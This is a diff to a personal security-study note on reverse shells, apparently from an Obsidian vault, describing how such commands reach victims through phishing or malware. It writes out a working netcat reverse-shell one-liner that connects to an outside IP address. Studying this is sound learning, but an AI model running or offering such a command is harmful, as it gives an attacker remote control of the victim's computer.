Mibu287/obsidian-vault/security/Reversed Shell.md

 # 3. Delivery method

-Reversed shell command (like `nc -e /bin/bash 1.1.1.1 80`) can be delivered to victim
+Reversed shell command (like `nc -e /bin/bash 1.1.1.1 80`) can be delivered to victim computer using various methods (like: phishing emails, malware files, ...).

+When victims are tricked to execute those commands, attackers has remote accesses to victims' computer.